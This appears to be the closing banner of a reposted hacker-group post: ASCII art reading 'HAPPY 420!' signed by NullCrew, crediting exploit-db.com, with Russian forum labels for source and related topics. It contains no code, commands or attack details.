              MMMMMM  "MMMM  .MMMMM(        .nnMP"
   ..          *MMMMx  MMM"  dMMMM"    .nnMMMMM*
    "MMn...     'MMMMr 'MM   MMM"   .nMMMMMMM*"
     "4MMMMnn..   *MMM  MM  MMP"  .dMMMMMMM""
       ^MMMMMMMMx.  *ML "M .M*  .MMMMMM**"
          *PMMMMMMhn. *x > M  .MMMM**""
             ""**MMMMhx/.h/ .=*"
                      .3P"%....
                   nP"     "*MMnx 

db   db  .d8b.  d8888b. d8888b. db    db     j88D    .d888b.  .d88b.  db 
88   88 d8' `8b 88  `8D 88  `8D `8b  d8'    j8~88    VP  `8D .8P  88. 88 
88ooo88 88ooo88 88oodD' 88oodD'  `8bd8'    j8' 88       odD' 88  d'88 YP 
88~~~88 88~~~88 88~~~   88~~~      88      V88888D    .88'   88 d' 88     - Especially you, silly govt.
88   88 88   88 88      88         88          88    j88.    `88  d8' db 
YP   YP YP   YP 88      88         YP          VP    888888D  `Y88P'  YP 
    
From your friendly neighborhood aliens! - NullCrew
twitter.com/NullCrew_FTS
 
Источник
www.exploit-db.com

Похожие темы